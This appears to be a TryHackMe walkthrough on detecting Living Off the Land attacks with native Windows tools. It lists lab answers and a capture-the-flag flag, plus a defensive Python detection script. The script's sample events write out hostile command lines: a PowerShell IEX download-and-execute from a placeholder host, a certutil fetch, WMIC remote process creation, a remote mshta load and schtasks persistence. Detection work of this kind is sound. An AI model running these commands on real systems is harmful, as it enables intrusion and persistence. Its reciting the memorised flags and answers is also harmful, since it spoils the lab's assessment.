Living Off the Land Attacks Tryhackme Walkthrough
Learn to detect and analyse Living Off the Land (LoL) attacks using trusted Windows tools. A practical 60-minute lab designed for cyber defenders to spot and respond to misuse of native OS tools.
Jawstar
11/3/2025, 2 min read


Attackers do not always rely on custom malware or malicious executables. They can use trusted system tools already present on the target machine.
In this room, users will learn what LoL attacks are, why adversaries choose them, and how defenders can detect such activity through log monitoring and behavioural analysis. The room progresses from foundational knowledge to hands-on detection practice.
Learning Objectives:
Understand what Living Off the Land attacks are
Identify legitimate Windows tools that can be abused
Recognise attacker techniques that blend into normal system operations
Detect LoL behaviour using log analysis and SIEM alerts
Task 2: Common LoL Tools and Techniques
Commonly abused tools provide scripting, management, file handling, or scheduling capabilities, which match common attacker needs like execution, persistence, reconnaissance, and lateral movement. Examples include:
PowerShell is used for in-memory scripting, remote downloads, and automation.
WMIC or WMI is used to run commands locally or on remote hosts and to query system state.
Certutil is used to fetch files and encode or decode payloads.
Mshta is used to run HTA content or an inline script delivered by a document or link.
Rundll32 is used to invoke DLL exports or trigger URL handlers.
Scheduled tasks (schtasks) are used to run code at logon or on a schedule for persistence.
Which public site lists Unix/Linux native binaries and how they can be abused?
GTFObins
Which Microsoft toolset includes PsExec and Autoruns, used for admin tasks and often misused by attackers?
Sysinternals
Task 3: Real-World Examples
What MITRE technique ID covers WMI event subscriptions?
T1546.003
Which abbreviated name refers to one of the services that C2s, like Cobalt Strike, use to start or listen for remote services?
SMB
Task 4: Detecting LoL Activity
Which PowerShell switch is used to download text/strings and execute them?
IEX
Which WMIC keyword triggers the creation of a new process on a remote host?
create
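As an added example, not part of the original room or of TryHackMe's material, the script below turns the Task 2 tool list and the Task 4 detection points (IEX download-and-execute, WMIC remote process `create`) into simple command-line rules and runs them over constructed process-creation events in the style of Sysmon Event ID 1 / Security 4688. Host names, paths and URLs are placeholders; a benign `schtasks /query` is included to show the rules do not fire on routine administration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 fields).
# Hosts, paths and URLs are placeholders; none of these records come from the lab.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\\Users\\Public\\p.bin"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "wmic /node:HOST01 process call create \"cmd.exe /c whoami\""},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "mshta.exe http://example.invalid/page.hta"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc onlogon"},
    # Benign control: querying an existing task is routine admin work and must not fire.
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "schtasks.exe /query /tn \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
]

# Each rule: (alert name, expected image basename, case-insensitive regex over the command line).
RULES = [
    ("powershell_download_and_execute", "powershell.exe",
     r"(iex|invoke-expression).*(downloadstring|downloadfile|net\.webclient|invoke-webrequest)"),
    ("certutil_remote_fetch_or_decode", "certutil.exe", r"-urlcache|-decode|-encode"),
    ("wmic_remote_process_create", "wmic.exe", r"/node:.*process\s+call\s+create"),
    ("mshta_remote_or_inline_script", "mshta.exe", r"https?://|vbscript:|javascript:"),
    ("rundll32_url_handler", "rundll32.exe", r"url\.dll,|javascript:"),
    ("schtasks_persistence", "schtasks.exe", r"/create\b"),
]
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the alert names that match one event; an Office parent adds a context tag."""
    hits = []
    image = basename(event["image"])
    for name, exe, pattern in RULES:
        if image == exe and re.search(pattern, event["cmd"], re.IGNORECASE):
            hits.append(name)
    if hits and basename(event["parent"]) in OFFICE_PARENTS:
        hits.append("spawned_by_office_document")
    return hits

def triage(events):
    """Map each command line that fires at least one rule to its alert names."""
    return {e["cmd"]: hits for e in events if (hits := evaluate(e))}
```

Running `triage(SAMPLE_EVENTS)` flags the five constructed LoL command lines and leaves the benign query unreported; in a real SIEM the same patterns belong in the tool's rule language, with parent-process and user context used to cut false positives.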
Task 5: Practical
What is the flag?
THM{LOL-but-not-that-lol-you-finishit}
Task 6: Wrapping Up
In this room, we examined how attackers repurpose trusted Windows utilities to carry out malicious activity without introducing new binaries. By testing and analysing each command safely, we observed how legitimate administrative tools such as PowerShell, WMIC, Certutil, Mshta, Rundll32, and Scheduled Tasks can be abused for execution, persistence, lateral movement, or evasion. Through these exercises, we developed a clearer view of how to recognise, detect, and respond when normal system processes are used with malicious intent.
We learned to:
Identify the built-in Windows tools most often abused in Living Off the Land attacks.
Understand how PowerShell enables fileless, in-memory, and automated execution.
Observe how WMIC supports remote process creation and system reconnaissance.
Recognise the ways Certutil downloads, encodes, or decodes malicious payloads.
Detect Mshta and Rundll32 being used to run scripts or DLL-based payloads.
Spot persistence mechanisms created or triggered through Scheduled Tasks.
Interpret process command lines and SIEM detections to separate admin from attacker behaviour.
Apply defensive techniques such as enhanced logging, behavioural detection, and execution control to limit LoL activity.
